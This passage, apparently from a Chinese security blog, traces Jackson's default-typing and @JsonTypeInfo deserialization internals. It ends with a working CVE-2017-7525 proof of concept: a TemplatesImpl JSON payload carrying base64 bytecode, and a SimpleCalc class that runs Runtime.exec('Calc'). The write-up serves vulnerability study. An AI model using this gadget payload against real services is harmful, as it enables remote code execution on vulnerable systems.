objectMapper2.writeValueAsString(person);  </span><br><span class="line">        System.out.println(<span class="string">&quot;\n无OBJECT_AND_NON_CONCRETE的JSON结果: &quot;</span>+s);  </span><br><span class="line">        <span class="type">Person</span> <span class="variable">p1</span> <span class="operator">=</span> objectMapper2.readValue(s, Person.class);  </span><br><span class="line">        System.out.println(<span class="string">&quot;无OBJECT_AND_NON_CONCRETE的对象结果:&quot;</span>+p1);  </span><br><span class="line">  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240206003530.png"><br>没啥区别，该Interface类属性在两种情况下都被成功序列化和反序列化（<strong>因为enableDefaultTyping()默认的无参数的设置就是此选项。</strong>）</p>
<h4 id="NON-CONCRETE-AND-ARRAYS"><a href="#NON-CONCRETE-AND-ARRAYS" class="headerlink" title="NON_CONCRETE_AND_ARRAYS"></a>NON_CONCRETE_AND_ARRAYS</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">import</span> com.fasterxml.jackson.core.JsonProcessingException;  </span><br><span class="line"><span class="keyword">import</span> com.fasterxml.jackson.databind.ObjectMapper;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JacksonTest</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;  </span><br><span class="line">        <span class="type">ObjectMapper</span> <span class="variable">objectMapper</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectMapper</span>();  </span><br><span class="line">        <span class="type">ObjectMapper</span> <span class="variable">objectMapper2</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectMapper</span>();  </span><br><span class="line">        objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_CONCRETE_AND_ARRAYS);  </span><br><span class="line">        <span class="type">Person</span> <span class="variable">person</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Person</span>();  </span><br><span class="line">        <span class="type">Hacker</span> <span class="variable">hacker1</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Hacker</span>();  </span><br><span class="line">        <span class="type">Hacker</span> <span class="variable">hacker2</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Hacker</span>();  </span><br><span class="line">        person.name = <span class="string">&quot;Jack&quot;</span>;  </span><br><span class="line">        person.age = <span class="number">551</span>;  </span><br><span class="line">        person.mySex = <span class="keyword">new</span> <span class="title class_">MySex</span>();  </span><br><span class="line">        person.lover = <span class="keyword">new</span> <span class="title class_">Hacker</span>[]&#123;hacker1,hacker2&#125;;  </span><br><span class="line">        <span class="type">String</span> <span class="variable">s</span> <span class="operator">=</span> objectMapper.writeValueAsString(person);  </span><br><span class="line">        System.out.println(<span class="string">&quot;有NON_CONCRETE_AND_ARRAYS的JSON结果: &quot;</span>+s);  </span><br><span class="line">        <span class="type">Person</span> <span class="variable">p</span> <span class="operator">=</span> objectMapper.readValue(s, Person.class);  </span><br><span class="line">        System.out.println(<span class="string">&quot;有NON_CONCRETE_AND_ARRAYS的对象结果:&quot;</span>+p);  </span><br><span class="line">  </span><br><span class="line">        <span class="type">String</span> <span class="variable">s1</span> <span class="operator">=</span> objectMapper2.writeValueAsString(person);  </span><br><span class="line">        System.out.println(<span class="string">&quot;\n无NON_FINA的JSON结果: &quot;</span>+s1);  </span><br><span class="line">        <span class="type">Person</span> <span class="variable">p1</span> <span class="operator">=</span> objectMapper2.readValue(s1, Person.class);  </span><br><span class="line">        System.out.println(<span class="string">&quot;无NON_FINA的对象结果:&quot;</span>+p1);  </span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>能够看到数组属性成功被反序列化<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240206012537.png"></p>
<h4 id="NON-FINA"><a href="#NON-FINA" class="headerlink" title="NON_FINA"></a>NON_FINA</h4><p>修改Person类加个Hacker属性，可以看出来，确实是非Final字段都给反序列化上了<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240206012213.png"></p>
<h3 id="JsonTypeInfo"><a href="#JsonTypeInfo" class="headerlink" title="@JsonTypeInfo"></a>@JsonTypeInfo</h3><h4 id="JsonTypeInfo-Id-NONE"><a href="#JsonTypeInfo-Id-NONE" class="headerlink" title="JsonTypeInfo.Id.NONE"></a>JsonTypeInfo.Id.NONE</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Person</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> String name;  </span><br><span class="line">    <span class="keyword">public</span> Integer age;  </span><br><span class="line">    <span class="meta">@JsonTypeInfo(use = JsonTypeInfo.Id.NONE)</span>  </span><br><span class="line">    <span class="keyword">public</span> Object lover;  </span><br><span class="line">    <span class="meta">@Override</span>  </span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">toString</span><span class="params">()</span> &#123;  </span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;Person&#123;&quot;</span> +  </span><br><span class="line">                <span class="string">&quot;name=&#x27;&quot;</span> + name + <span class="string">&#x27;\&#x27;&#x27;</span> +  </span><br><span class="line">                <span class="string">&quot;, age=&quot;</span> + age +  </span><br><span class="line">                <span class="string">&quot;, lover=&quot;</span> + lover +  </span><br><span class="line">                <span class="string">&#x27;&#125;&#x27;</span>;  </span><br><span class="line">    &#125;  </span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">Person</span><span class="params">()</span> &#123;  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">import</span> com.fasterxml.jackson.core.JsonProcessingException;  </span><br><span class="line"><span class="keyword">import</span> com.fasterxml.jackson.databind.ObjectMapper;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JacksonTest</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;  </span><br><span class="line">        <span class="type">ObjectMapper</span> <span class="variable">objectMapper</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectMapper</span>();  </span><br><span class="line"></span><br><span class="line">        <span class="type">Person</span> <span class="variable">person</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Person</span>();  </span><br><span class="line">        <span class="type">Hacker</span> <span class="variable">hacker</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Hacker</span>();  </span><br><span class="line">        person.lover = hacker;  </span><br><span class="line">        person.name = <span class="string">&quot;Jack&quot;</span>;  </span><br><span class="line">        person.age = <span class="number">551</span>;  </span><br><span class="line">        <span class="type">String</span> <span class="variable">s</span> <span class="operator">=</span> objectMapper.writeValueAsString(person);  </span><br><span class="line">        System.out.println(s);  </span><br><span class="line">        <span class="type">Person</span> <span class="variable">p</span> <span class="operator">=</span> objectMapper.readValue(s, Person.class);  </span><br><span class="line">        System.out.println(p);  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看出有没有这个标记都没什么区别<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240206125151.png"></p>
<h4 id="JsonTypeInfo-Id-CLASS"><a href="#JsonTypeInfo-Id-CLASS" class="headerlink" title="JsonTypeInfo.Id.CLASS"></a>JsonTypeInfo.Id.CLASS</h4><p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240206172209.png"><br>被标记的属性成功被反序列化<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240206125305.png"></p>
<h4 id="JsonTypeInfo-Id-MINIMAL-CLASS"><a href="#JsonTypeInfo-Id-MINIMAL-CLASS" class="headerlink" title="JsonTypeInfo.Id.MINIMAL_CLASS"></a>JsonTypeInfo.Id.MINIMAL_CLASS</h4><p>将lover属性上面的注释改为<code>JsonTypeInfo.Id.MINIMAL_CLASS</code>，测试结果与<code>JsonTypeInfo.Id.CLASS</code>基本无异，仅有<code>@class -&gt; @c</code>这一个区别<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240206174409.png"></p>
<h4 id="JsonTypeInfo-Id-NAME"><a href="#JsonTypeInfo-Id-NAME" class="headerlink" title="JsonTypeInfo.Id.NAME"></a>JsonTypeInfo.Id.NAME</h4><p>修改 Person 类中的object属性 <code>@JsonTypeInfo</code> 注解值为 <code>JsonTypeInfo.Id.NAME</code><br>输出看到，object 属性中多了 <code>&quot;@type&quot;:&quot;Hacker&quot;</code>，但没有具体的包名在内的类名，因此在后面的反序列化的时候会报错，也就是说这个设置值是不能被反序列化利用的：<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240206181247.png"></p>
<h4 id="JsonTypeInfo-Id-CUSTOM"><a href="#JsonTypeInfo-Id-CUSTOM" class="headerlink" title="JsonTypeInfo.Id.CUSTOM"></a>JsonTypeInfo.Id.CUSTOM</h4><p>这个值是提供给用户自定义的意思，没办法直接使用的，需要手动写一个解析器才能配合使用，直接运行会抛出异常</p>
<h3 id="通用特性"><a href="#通用特性" class="headerlink" title="通用特性"></a>通用特性</h3><p>在反序列化的时候会调用其构造方法以及set方法<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240206185441.png"></p>
<p>简单做个调试分析，在<code>objectMapper.readValue</code>处打上断点跟进，最终对我们所传入的<code>content</code>进行一系列判断以及一系列设置之后来到了<code>deser.deserialize()</code>，我们接着跟进<code>deserialize</code></p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219165639.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219165713.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219165801.png"></p>
<p>这里会根据我们所传入的content进行一个状态判断，当当前的token为<code>&#123;</code>才调用72-73行的逻辑，然后在72行这里涉及到了一个<strong>vanillaProcessing</strong>属性，这个属性是一个布尔值，用来表示是否使用<strong>普通模式</strong>来反序列化对象。普通模式是指不需要处理<strong>类型信息</strong>、<strong>对象标识</strong>、<strong>引用</strong>、<strong>更新</strong>、<strong>注解</strong>等特殊情况的反序列化过程。如果这个属性为<strong>true</strong>，那么反序列化时会调用<strong>vanillaDeserialize</strong>方法，这个方法是最快的反序列化方法。如果这个属性为<strong>false</strong>，那么反序列化时会根据不同的情况选择其他的反序列化方法</p>
<p>这个属性是在<strong>BeanDeserializer</strong>类的构造方法中初始化的，它的值取决于<strong>BeanDeserializerBase</strong>类的<strong>nonStandardCreation</strong>属性，这个属性表示是否需要使用非标准的创建方式，比如有参数的构造器或者工厂方法。如果<strong>nonStandardCreation</strong>为<strong>true</strong>，那么<strong>vanillaProcessing</strong>就为<strong>false</strong>，反之亦然。<strong>vanillaProcessing</strong>这个属性是Jackson里面的一个内部实现细节，一般不需要我们关心。</p>
<p>除此之外的话，就是token状态也发生了改变，从<code>START OBJECT</code>变成了<code>FIELD NAME</code>状态</p>
<p>我们跟进一下<code>vanillaDeserialize()</code>方法</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219172603.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219192418.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219192452.png"></p>
<p>一进来就看到了跟进目标<code>this._valueInstantiator.createUsingDefault(ctxt);</code>，这里的<code>valueInstantiator</code>属性用来表示如何创建和初始化一个反序列化的对象，这里是调用对象的默认构造器，进去瞅一眼发现这里的<code>defaultCreateor</code>早就给设置好了，就是我们Person的无参构造方法，打断点回溯看一看发现在设置反序列化器的时候就已经安排妥当了，我们跳过不管，继续跟进</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219173419.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219174106.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219174420.png"></p>
<p>经过一系列<code>newInstance</code>来到了<code>Person()</code>处，调试任务完成一大半了，出栈继续调试</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219174856.png"></p>
<p>回到<code>vanillaDeserialize</code>，172行将刚才拿到的Person对象作为接下来的设置目标，之后再判断一下当前的token是否能够提供属性名，因为当前是<code>FIELD NAME</code>所以可以走接下来的逻辑，执行到181行的<code>deserialzeAndSet</code>，同时将当前的token状态切换为<code>VALUE_STRING</code>，我们接着跟进一下<code>deserialzeAndSet</code></p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219193321.png"></p>
<p>跟进之后这里的72行很是吸睛，看了看__setter属性，发现是我们setter的Method对象，估计是前面实例化prop那一块出来的东西，72行这里用到的value是在69行操作出来的，接着跟进69行的<code>this.deserialize()</code></p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219193942.png"></p>
<p>这里先拿了 json 数据的数据类型，接下来判断这个节点的数据类型是否为 null，如果不为 null，再判断 <code>this._valueTypeDeserializer</code> 是否为空，如果不为空则继续调用 <code>this._valueDeserializer.deserialize()</code> 方法，这里图是在截不全了，把273单拿出来看，因为这里确实是空的，所以是来到<code>this._valueDeserializer.deserialize(p, ctxt)</code>，接着走</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">return</span> <span class="built_in">this</span>._valueTypeDeserializer != <span class="literal">null</span> ? <span class="built_in">this</span>._valueDeserializer.deserializeWithType(p, ctxt, <span class="built_in">this</span>._valueTypeDeserializer) : <span class="built_in">this</span>._valueDeserializer.deserialize(p, ctxt);</span><br></pre></td></tr></table></figure>

<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219194813.png"></p>
<p>因为当前的<code>token</code>符合<code>VALUE_STRING</code>，所以直接从json字符串里面返回<code>text</code>就完事儿了</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219195634.png"></p>
<p>拿到value之后调用set方法给当前bean设置一下</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219195753.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219195914.png"></p>
<p>到这里我们第一个属性循环就算走完了，根据这里do…while循环设置的条件，只要属性没全部取完，属性设置就不会结束。现在，我们开始新一轮循环。设置的属性是<code>age</code></p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219200014.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219200516.png"></p>
<p>大体步骤和设置name基本一样，因为<code>this._valueTypeDeserializer</code> 依然为空，所以这里进去的<code>deserialize</code>和 name那个保持一致，都是 <code>this._valueDeserializer.deserialize(p, ctxt);</code>，这块调用的是专门处理数字的反序列化器，然后因为这里的JsonToken确实是<code>VALUE_NUMBER_INT</code>，所以这里的三目走的是<code>p.getIntValue()</code>，从Json字符串里直接拿到了对应值。</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219200933.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219201221.png"></p>
<p>最后一轮循环设置的是lover属性，和前面略有区别，这里进去了<code>this._valueDeserializer.deserializeWithType(p, ctxt, this._valueTypeDeserializer)</code><br>我们仔细看一看<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219201502.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219201659.png"></p>
<p>进去之后会对当前的<code>tokenid</code>进行一个判断，因为这里是start object 所以走的是5这条逻辑(和之前那个判id的一模一样)，跟进一下402行</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219201852.png"><br>走 <code>this.deserializeTypedFromObject(p, ctxt)</code> 这里，接着跟<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219202121.png"></p>
<p>token向后切换了一下变成了<code>FILED NAME</code>，来到<code>@class</code>属性这里。之后就是凭借@class成功通过67行的判断来到68行</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219202617.png"></p>
<p>凭借typeid进行反序列化，先把全类名和反序列化器给拿到手上，之后来到99行进行反序列化</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219204007.png"></p>
<p>熟悉的<code>BeanDeserializer#deserialize</code>，因为这里的token已经不是<code>START OBJECT</code>所以和我们第一次来到这里的做反序列化步骤还有区别，调用的是79行的逻辑。</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219204458.png"></p>
<p>跟进79行后不得不感叹条条大路通罗马，这里还是殊途同归地给调用上了<code>this.vanillaDeserialize()</code>来到我们熟悉的属性循环，这里就不详细跟进了，直接出栈</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219205004.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219205214.png"></p>
<p> 来到最后一个setter调用处，对bean设置lover属性，走完bean的最后一轮while循环，至此基础反序列化流程分析完毕。</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219210049.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240219210030.png"></p>
<h2 id="Jackson漏洞"><a href="#Jackson漏洞" class="headerlink" title="Jackson漏洞"></a>Jackson漏洞</h2><p>结合前面的探究结果，不难得出，满足下面三个条件之一即存在Jackson反序列化漏洞：</p>
<ul>
<li>调用了 <code>ObjectMapper.enableDefaultTyping()</code> 函数；</li>
<li>对要进行反序列化的类的属性使用了值为 <code>JsonTypeInfo.Id.CLASS</code> 的 <code>@JsonTypeInfo</code> 注解；</li>
<li>对要进行反序列化的类的属性使用了值为 <code>JsonTypeInfo.Id.MINIMAL_CLASS</code> 的 <code>@JsonTypeInfo</code> 注解；<br>在这些情况下Jackson 反序列化会调用属性所属类的构造函数和 setter 方法，而如果调用的构造函数或 setter 方法存在危险操作，那么我们就可以说其存在 Jackson 反序列化漏洞。</li>
</ul>
<h3 id="CVE-2017-7525"><a href="#CVE-2017-7525" class="headerlink" title="CVE-2017-7525"></a>CVE-2017-7525</h3><p>利用链是 TemplatesImpl 链，所以要求 JDK 版本是 7u21 或者 8u20，动态代理相关的链子，这部分之前已经分析过了，相关代码如下</p>
<h4 id="环境准备"><a href="#环境准备" class="headerlink" title="环境准备"></a>环境准备</h4><p>PoC.java</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">PoC</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;  </span><br><span class="line">        <span class="type">String</span> <span class="variable">exp</span> <span class="operator">=</span> readClassStr(<span class="string">&quot;D:\\SimpleCalc.class&quot;</span>);  </span><br><span class="line">        <span class="type">String</span> <span class="variable">jsonInput</span> <span class="operator">=</span> aposToQuotes(<span class="string">&quot;&#123;\&quot;object\&quot;:[&#x27;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&#x27;,\n&quot;</span> +  </span><br><span class="line">                <span class="string">&quot;&#123;\n&quot;</span> +  </span><br><span class="line">                <span class="string">&quot;&#x27;transletBytecodes&#x27;:[&#x27;&quot;</span>+exp+<span class="string">&quot;&#x27;],\n&quot;</span> +  </span><br><span class="line">                <span class="string">&quot;&#x27;transletName&#x27;:&#x27;null&#x27;,\n&quot;</span> +  </span><br><span class="line">                <span class="string">&quot;&#x27;outputProperties&#x27;:&#123;&#125;\n&quot;</span> +  </span><br><span class="line">                <span class="string">&quot;&#125;\n&quot;</span> +  </span><br><span class="line">                <span class="string">&quot;]\n&quot;</span> +  </span><br><span class="line">                <span class="string">&quot;&#125;&quot;</span>);  </span><br><span class="line">        System.out.printf(jsonInput);  </span><br><span class="line">        <span class="type">ObjectMapper</span> <span class="variable">mapper</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectMapper</span>();  </span><br><span class="line">        mapper.enableDefaultTyping();  </span><br><span class="line">        Test test;  </span><br><span class="line">        <span class="keyword">try</span> &#123;  </span><br><span class="line">            test = mapper.readValue(jsonInput, Test.class);  </span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;  </span><br><span class="line">            e.printStackTrace();  </span><br><span class="line">        &#125;  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> String <span class="title function_">aposToQuotes</span><span class="params">(String json)</span>&#123;  </span><br><span class="line">        <span class="keyword">return</span> json.replace(<span class="string">&quot;&#x27;&quot;</span>,<span class="string">&quot;\&quot;&quot;</span>);  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> String <span class="title function_">readClassStr</span><span class="params">(String cls)</span> <span class="keyword">throws</span> Exception&#123;  </span><br><span class="line">  </span><br><span class="line">        <span class="type">File</span> <span class="variable">file</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">File</span>(cls);  </span><br><span class="line">        <span class="type">FileInputStream</span> <span class="variable">fileInputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">FileInputStream</span>(file);  </span><br><span class="line">        <span class="type">byte</span>[] bytes = <span class="keyword">new</span> <span class="title class_">byte</span>[(<span class="type">int</span>) file.length()];  </span><br><span class="line">        fileInputStream.read(bytes);  </span><br><span class="line">        <span class="type">String</span> <span class="variable">base64Encoded</span> <span class="operator">=</span> DatatypeConverter.printBase64Binary(bytes);  </span><br><span class="line">        <span class="keyword">return</span> base64Encoded;  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>SimpleCalc.java</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.DOM;  </span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.TransletException;  </span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;  </span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;  </span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xml.internal.serializer.SerializationHandler;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">SimpleCalc</span> <span class="keyword">extends</span> <span class="title class_">AbstractTranslet</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">SimpleCalc</span><span class="params">()</span> <span class="keyword">throws</span> Exception &#123;  </span><br><span class="line">        Runtime.getRuntime().exec(<span class="string">&quot;Calc&quot;</span>);  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">    <span class="meta">@Override</span>  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">transform</span><span class="params">(DOM document, SerializationHandler[] handlers)</span> <span class="keyword">throws</span> TransletException &#123;  </span><br><span class="line">  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">    <span class="meta">@Override</span>  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">transform</span><span class="params">(DOM document, DTMAxisIterator iterator, SerializationHandler handler)</span> <span class="keyword">throws</span> TransletException &#123;  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Test.java</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Test</span> &#123;    </span><br><span class="line">    <span class="keyword">public</span> Object object;    </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>测试结果如下<br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220000316.png"></p>
<p>关于Templates链的衔接，在Fastjson里面是通过任意getter调用衔接<code>getOutputProperties</code>调用多个，而在那几条常见的CC中一般也是衔接<code>newTransform</code>来做的调用。显然和我们前面研究的Jackson所提供的条件有所出入，我们调试排查一下。</p>
<h4 id="调试分析"><a href="#调试分析" class="headerlink" title="调试分析"></a>调试分析</h4><p>readValue这里把断点打一下，因为大多流程在分析Jackson反序列化特点的时候已经写过了，直接从<code>deserializeAnddSet</code>这里接着开始。</p>
<p><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220014813.png"><br><img src="https://hmsblog-1321977790.cos.ap-beijing.myqcloud.com/Jackson1/Pasted%20image%2020240220015416.png"></p>
